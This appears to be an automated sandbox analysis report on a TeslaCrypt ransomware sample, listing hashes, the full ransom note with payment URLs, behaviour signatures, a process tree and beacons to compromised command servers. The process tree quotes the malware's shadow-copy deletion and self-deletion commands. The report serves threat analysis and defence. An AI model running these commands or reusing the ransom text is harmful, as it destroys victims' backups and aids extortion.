Analysis

  • max time kernel
    121s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    18/10/2024, 17:12 UTC

General

  • Target

    58999b891c115ca4cd983c9675724890_JaffaCakes118.exe

  • Size

    376KB

  • MD5

    58999b891c115ca4cd983c9675724890

  • SHA1

    8157379d1d1a40de5dfd00ea70c2cacc6b5d2f5e

  • SHA256

    ae50c1a234d07eb39859cf7aea9361d9b54397d477866ae38bb61ad904298315

  • SHA512

    6773b60e8ad7e940724daf5aa81cd1c08c113b4087c6ff69b21a12fd3c684e441007ab2968780ad5c0425a45ee1b2f3b8f486cc832415ce21f75da0b65e522ed

  • SSDEEP

    6144:ue3rNhMeYq4CGRTs4kadSoKVStcmTVn57CpSCwsUbg62oXd:uY5hMfqwTsTKcmTV5kINEx+d

Malware Config

Extracted

Path

C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+bggqw.txt

Family

teslacrypt

Ransom Note

    NOT YOUR LANGUAGE? USE https://translate.google.com

    What happened to your files ?
    All of your files were protected by a strong encryption with RSA-4096.
    More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)

    How did this happen ?
    !!! Specially for your PC was generated personal RSA-4096 KEY, both public and private.
    !!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.
    !!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server

    What do I do ?
    So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.
    If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.

    For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:
    1. http://tt54rfdjhb34rfbnknaerg.milerteddy.com/8558F3F2A5143E52
    2. http://kkd47eh4hdjshb5t.angortra.at/8558F3F2A5143E52
    3. http://ytrest84y5i456hghadefdsd.pontogrot.com/8558F3F2A5143E52

    If for some reasons the addresses are not available, follow these steps:
    1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en
    2. After a successful installation, run the browser
    3. Type in the address bar: xlowfznrg4wf7dli.onion/8558F3F2A5143E52
    4. Follow the instructions on the site.

    ---------------- IMPORTANT INFORMATION------------------------
    *-*-* Your personal pages:
    http://tt54rfdjhb34rfbnknaerg.milerteddy.com/8558F3F2A5143E52
    http://kkd47eh4hdjshb5t.angortra.at/8558F3F2A5143E52
    http://ytrest84y5i456hghadefdsd.pontogrot.com/8558F3F2A5143E52
    *-*-* Your personal page Tor-Browser: xlowfznrg4wf7dli.ONION/8558F3F2A5143E52

URLs

http://tt54rfdjhb34rfbnknaerg.milerteddy.com/8558F3F2A5143E52

http://kkd47eh4hdjshb5t.angortra.at/8558F3F2A5143E52

http://ytrest84y5i456hghadefdsd.pontogrot.com/8558F3F2A5143E52

http://xlowfznrg4wf7dli.ONION/8558F3F2A5143E52

Signatures

  • TeslaCrypt, AlphaCrypt

    Ransomware based on CryptoLocker. Shut down by the developers in 2016.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (433) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes itself 1 IoCs
  • Drops startup file 6 IoCs
  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs
  • System policy modification 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\58999b891c115ca4cd983c9675724890_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\58999b891c115ca4cd983c9675724890_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1288
    • C:\Users\Admin\AppData\Local\Temp\58999b891c115ca4cd983c9675724890_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\58999b891c115ca4cd983c9675724890_JaffaCakes118.exe"
      2⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2744
      • C:\Windows\dltalnccsvya.exe
        C:\Windows\dltalnccsvya.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2736
        • C:\Windows\dltalnccsvya.exe
          C:\Windows\dltalnccsvya.exe
          4⤵
          • Drops startup file
          • Executes dropped EXE
          • Adds Run key to start application
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          • System policy modification
          PID:2180
          • C:\Windows\System32\wbem\WMIC.exe
            "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:708
          • C:\Windows\SysWOW64\NOTEPAD.EXE
            "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RECOVERY.TXT
            5⤵
            • System Location Discovery: System Language Discovery
            • Opens file in notepad (likely ransom note)
            PID:2872
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\RECOVERY.HTM
            5⤵
            • Modifies Internet Explorer settings
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2876
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2876 CREDAT:275457 /prefetch:2
              6⤵
              • System Location Discovery: System Language Discovery
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:2708
          • C:\Windows\System32\wbem\WMIC.exe
            "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:476
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c DEL C:\Windows\DLTALN~1.EXE
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2568
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\AppData\Local\Temp\58999B~1.EXE
        3⤵
        • Deletes itself
        • System Location Discovery: System Language Discovery
        PID:2812
  • C:\Windows\SysWOW64\DllHost.exe
    C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    PID:1796

Network

  • flag-us
    DNS
    www.big-cola.com
    dltalnccsvya.exe
    Remote address:
    8.8.8.8:53
    Request
    www.big-cola.com
    IN A
    Response
    www.big-cola.com
    IN A
    95.211.219.67
  • flag-nl
    POST
    http://www.big-cola.com/imgs/videos/bsts.php
    dltalnccsvya.exe
    Remote address:
    95.211.219.67:80
    Request
    POST /imgs/videos/bsts.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
    Host: www.big-cola.com
    Content-Length: 645
    Cache-Control: no-cache
    Response
    HTTP/1.1 302 Found
    cache-control: max-age=0, private, must-revalidate
    connection: close
    content-length: 11
    date: Fri, 18 Oct 2024 17:13:54 GMT
    location: http://survey-smiles.com
    server: nginx
    set-cookie: sid=5ae8a1e7-8d74-11ef-8c6d-f68949463857; path=/; domain=.big-cola.com; expires=Wed, 05 Nov 2092 20:28:02 GMT; max-age=2147483647; HttpOnly
  • flag-us
    DNS
    survey-smiles.com
    dltalnccsvya.exe
    Remote address:
    8.8.8.8:53
    Request
    survey-smiles.com
    IN A
    Response
    survey-smiles.com
    IN A
    199.59.243.227
  • flag-us
    GET
    http://survey-smiles.com/
    dltalnccsvya.exe
    Remote address:
    199.59.243.227:80
    Request
    GET / HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
    Cache-Control: no-cache
    Host: survey-smiles.com
    Response
    HTTP/1.1 200 OK
    date: Fri, 18 Oct 2024 17:13:57 GMT
    content-type: text/html; charset=utf-8
    content-length: 1054
    x-request-id: 97b118db-7a80-42ec-9494-6bd72f86aab0
    cache-control: no-store, max-age=0
    accept-ch: sec-ch-prefers-color-scheme
    critical-ch: sec-ch-prefers-color-scheme
    vary: sec-ch-prefers-color-scheme
    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_xsdd8M7M5chhqnrrB0sbDIjikLNSaqd7FdKSM7smXMnzR651qna8/KU7hu7STFpIV9DxKdvN6NAk7xr/Gf56lw==
    set-cookie: parking_session=97b118db-7a80-42ec-9494-6bd72f86aab0; expires=Fri, 18 Oct 2024 17:28:58 GMT; path=/
  • flag-us
    DNS
    ikstrade.co.kr
    dltalnccsvya.exe
    Remote address:
    8.8.8.8:53
    Request
    ikstrade.co.kr
    IN A
    Response
  • flag-us
    DNS
    ikstrade.co.kr
    dltalnccsvya.exe
    Remote address:
    8.8.8.8:53
    Request
    ikstrade.co.kr
    IN A
  • flag-us
    DNS
    lutheranph.com
    dltalnccsvya.exe
    Remote address:
    8.8.8.8:53
    Request
    lutheranph.com
    IN A
    Response
    lutheranph.com
    IN A
    34.70.133.246
    lutheranph.com
    IN A
    35.225.36.88
    lutheranph.com
    IN A
    107.178.223.183
    lutheranph.com
    IN A
    104.155.138.21
  • flag-us
    POST
    http://lutheranph.com/wp-content/uploads/bsts.php
    dltalnccsvya.exe
    Remote address:
    34.70.133.246:80
    Request
    POST /wp-content/uploads/bsts.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
    Host: lutheranph.com
    Content-Length: 645
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Content-Length: 0
  • flag-us
    DNS
    hongsi.com
    dltalnccsvya.exe
    Remote address:
    8.8.8.8:53
    Request
    hongsi.com
    IN A
    Response
    hongsi.com
    IN A
    110.45.144.173
  • flag-kr
    POST
    http://hongsi.com/whiteboard_dangam/admin/bsts.php
    dltalnccsvya.exe
    Remote address:
    110.45.144.173:80
    Request
    POST /whiteboard_dangam/admin/bsts.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
    Host: hongsi.com
    Content-Length: 645
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Date: Fri, 18 Oct 2024 17:14:02 GMT
    Server: Apache
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=iso-8859-1
  • flag-us
    DNS
    dustywinslow.com
    dltalnccsvya.exe
    Remote address:
    8.8.8.8:53
    Request
    dustywinslow.com
    IN A
    Response
  • flag-us
    DNS
    lovemydress.pl
    dltalnccsvya.exe
    Remote address:
    8.8.8.8:53
    Request
    lovemydress.pl
    IN A
    Response
  • flag-nl
    POST
    http://www.big-cola.com/imgs/videos/bsts.php
    dltalnccsvya.exe
    Remote address:
    95.211.219.67:80
    Request
    POST /imgs/videos/bsts.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
    Host: www.big-cola.com
    Content-Length: 645
    Cache-Control: no-cache
    Cookie: sid=5ae8a1e7-8d74-11ef-8c6d-f68949463857
    Response
    HTTP/1.1 302 Found
    cache-control: max-age=0, private, must-revalidate
    connection: close
    content-length: 11
    date: Fri, 18 Oct 2024 17:14:17 GMT
    location: http://survey-smiles.com
    server: nginx
  • flag-us
    GET
    http://survey-smiles.com/
    dltalnccsvya.exe
    Remote address:
    199.59.243.227:80
    Request
    GET / HTTP/1.1
    Cookie: parking_session=97b118db-7a80-42ec-9494-6bd72f86aab0
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
    Host: survey-smiles.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    date: Fri, 18 Oct 2024 17:14:18 GMT
    content-type: text/html; charset=utf-8
    content-length: 1054
    x-request-id: ca93442d-ce13-4f92-8908-51840b89b1b9
    cache-control: no-store, max-age=0
    accept-ch: sec-ch-prefers-color-scheme
    critical-ch: sec-ch-prefers-color-scheme
    vary: sec-ch-prefers-color-scheme
    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_xsdd8M7M5chhqnrrB0sbDIjikLNSaqd7FdKSM7smXMnzR651qna8/KU7hu7STFpIV9DxKdvN6NAk7xr/Gf56lw==
    set-cookie: parking_session=97b118db-7a80-42ec-9494-6bd72f86aab0; expires=Fri, 18 Oct 2024 17:29:18 GMT
  • flag-us
    POST
    http://lutheranph.com/wp-content/uploads/bsts.php
    dltalnccsvya.exe
    Remote address:
    34.70.133.246:80
    Request
    POST /wp-content/uploads/bsts.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
    Host: lutheranph.com
    Content-Length: 645
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Content-Length: 0
  • flag-kr
    POST
    http://hongsi.com/whiteboard_dangam/admin/bsts.php
    dltalnccsvya.exe
    Remote address:
    110.45.144.173:80
    Request
    POST /whiteboard_dangam/admin/bsts.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
    Host: hongsi.com
    Content-Length: 645
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Date: Fri, 18 Oct 2024 17:14:19 GMT
    Server: Apache
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=iso-8859-1
  • flag-us
    DNS
    lovemydress.pl
    dltalnccsvya.exe
    Remote address:
    8.8.8.8:53
    Request
    lovemydress.pl
    IN A
    Response

MITRE ATT&CK Enterprise v15
